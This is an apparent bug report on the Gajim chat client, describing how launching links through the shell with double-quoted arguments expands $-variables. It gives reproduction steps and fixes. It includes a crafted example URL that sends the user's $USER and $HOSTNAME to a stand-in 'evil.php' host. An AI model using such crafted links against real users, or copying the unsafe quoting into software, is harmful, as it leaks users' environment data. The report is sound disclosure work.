launch_browser_mailer mangles links containing $
Bug description
If you attempt to click on a link in a chat session that contains the $ symbol, any text after that symbol until the next special character will be lost when the browser navigates to that url.
This seems to be because to launch a web-page gajim is using Popen and $tokens evaluate to bash variables under linux. Additionally it is possible to craft urls such as http://example.com/evil.php?username=$USER&hostname=$HOSTNAME which if clicked by the user allow environmental variables to leak in a XSS-esque way.
Steps to reproduce
- Open gajim chat window
- Post url such as http://example.com/evil.php?username=$USER&hostname=$HOSTNAME
- Click url
- See browser load up an unexpected address.
Software versions
OS version: Fedora Linux : 2.6.32.11-99.fc12.x86_64 GTK version: 2.16.0 PyGTK version: 2.18.9
Proposed Solutions
- In build_command on line 382 of src/common/helpers.py instead of putting the parameter in "" which allow shell variables to be evaluated enclose in ''
- Use webbrowser to handle link opening and do not manually popen.